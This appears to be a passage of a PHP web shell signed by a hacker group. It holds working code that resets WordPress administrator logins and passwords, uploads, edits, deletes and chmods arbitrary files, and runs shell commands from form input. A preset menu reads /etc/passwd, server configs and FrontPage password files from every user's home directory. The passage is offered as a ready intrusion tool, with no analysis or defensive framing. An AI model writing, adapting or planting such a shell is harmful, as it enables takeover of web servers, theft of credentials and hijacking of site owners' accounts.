size=\"15\" value=\"admin\"><br> Set A New password 4 Login : <INPUT name=\"pwd\" size=\"15\" value=\"123456\"><br> <INPUT value=\"change\" name=\"send\" type=\"submit\"> </FORM>"; }else{ $localhost = $_POST['localhost']; $database = $_POST['database']; $username = $_POST['username']; $password = $_POST['password']; $pwd = $_POST['pwd']; $admin = $_POST['admin']; @mysql_connect($localhost,$username,$password) or die(mysql_error()); @mysql_select_db($database) or die(mysql_error()); $hash = crypt($pwd); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error()); $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error()); if($a4s){ echo "<b> Success :Now Use A New User And Pass To login In The Admin Panel</b> "; } } break; } } else //Default page that will be shown when the page isn't found or no page is selected. { $files = array(); $directories = array(); if(isset($_FILES['uploadedfile']['name'])) { $target_path = realpath('.').'/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { print "File:". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "File upload failed!"; } } print "<table border=0 width=100%><td width=15% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a> <a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a> <a href=\"?fdownload=".realpath($file)."\"><font size='2'><font color='#ffc080' size='2'>[Dwnld]</font></a> </td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } foreach($files as $file) { print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\"><font color='#ff40ff' size='2'>[Renm]</font></a> <a href=\"?p=delete&file=".realpath($file)."\">[Del]</font></a> <a href=\"?fdownload=".realpath($file)."\"><font color='#ffc080' size='2'>[Dwnld]</font></a> </td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } } else { print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; } print "</table><hr><table border=0 width=100%><td><b>~[ Upload File ]~</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> <input type='hidden' name='MAX_FILE_SIZE' value='100000000' style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' /><input size=30 style='color: #ffffff; font-size:8pt; border: 1px dotted #ffffff; background-color: #000000' name='uploadedfile' type='file'><input type='submit' value='Upload File !' name='uploadedfile' style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"> </form></td><td><form action=\"".$me."\" method=GET><b>~[ Go Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=submit value=\" Go Dir\"></form></td> <tr><td><form action=\"".$me."\" method=GET><b>~[ Create File, Read File ]~<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create File\" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form> </td><td><form action=\"".$me."\" method=GET><b>~[ Make Dir ]~<br></b><input style=\"border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\" type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Make Dir \" style=\"border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000\"></form></td> </table>"; echo "<table border='2'>"; print_r(' <form method="POST" action=""> <b>Command :</font></b><input size=40 name="comx1" type="text" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"><input value="Enter" type="submit" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"> </form> <form method="POST" action=""> <select size="1" size=60 name="comxx" style="border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"> <option value="cat /etc/passwd">/etc/passwd</option> <option value="netstat -an | grep -i listen">رؤية البورتات المفتوحه بالسيرفر</option> <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option> <option value="cat /etc/syslog.conf">/etc/syslog.conf</option> <option value="cat /etc/hosts">/etc/hosts</option> <option value="cat /etc/named.conf">/etc/named.conf</option> <option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option> <option value="ls -lia">ls -lia</option> <option value="cat /home/*/public_html/_vti_pvt/access.cnf">cat /home/*/public_html/_vti_pvt/access.cnf</option> <option value="cat /home/*/public_html/_vti_pvt/service.pwd">cat /home/*/public_html/_vti_pvt/service.pwd</option> <option value="cat /usr/local/apache/conf/httpd.conf">cat /usr/local/apache/conf/httpd.conf</option> </select> <input type="submit" value="Enter" style="border:1px dotted #60c0ff; font-family:Tahoma; font-size:8pt; color:#FFB200; background-color:#000000"> </form> </pre> '); $comn1=shell_exec($_POST[comx1]); $comn2=shell_exec($_POST[comxx]); if($comn2 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn2</textarea>"; if($comn1 != "") echo "<textarea cols='125' rows='29' style='border:1px dotted #CCFF00; color:#FFB200; font-family:Tahoma; font-size:8pt; background-color:#000000'>$comn1</textarea>"; echo "</textarea>"; echo '</h4></pre></center></table></td>'; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."<br>"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf('%o', fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode('\\',realpath($where)); } else { $dirparts = explode('/',realpath($where)); } $i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i) { $pre .= $dirparts[$p]."/"; $p++; } $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; $i++; } return "<h2>".$total."</h2><br>"; } print $footer; exit(); ?> <script language="JavaScript"> <!-- var x = 0 var speed = 300 var text = "[~ BO3LA HaCkEr - Ml7S-HaCkErS ~]" function Blinky() { window.status = text setTimeout("Blinky2()", speed) } function Blinky2() { window.status = " " setTimeout("Blinky()", speed) } Blinky() </script>